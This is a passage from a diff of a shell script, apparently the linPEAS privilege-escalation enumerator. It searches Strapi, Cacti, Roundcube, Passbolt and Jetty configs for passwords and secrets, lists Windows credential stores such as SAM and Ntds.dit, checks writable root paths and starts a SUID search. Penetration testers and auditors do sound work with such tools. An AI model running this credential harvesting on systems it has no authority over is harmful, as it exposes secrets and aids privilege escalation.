"$PSTORAGE_STRAPI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Strapi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name "custom.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "database.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "response.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_CACTI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cacti Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_ROUNDCUBE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Roundcube Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" | sed -${E} "s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_PASSBOLT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Passbolt Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Jetty Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + + + +if [ "$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Interesting logs Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "error.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_WINDOWS_FILES" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Windows Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_OTHER_INTERESTING_FILES" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Other Interesting Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bashrc"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".profile"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".rhosts"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; +fi + + +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q interesting_files; then +print_title "Interesting Files" +########################################### +#----------) Interesting files (----------# +########################################### + +check_critial_root_path(){ + folder_path="$1" + if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi +} + + + + + + + + +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + 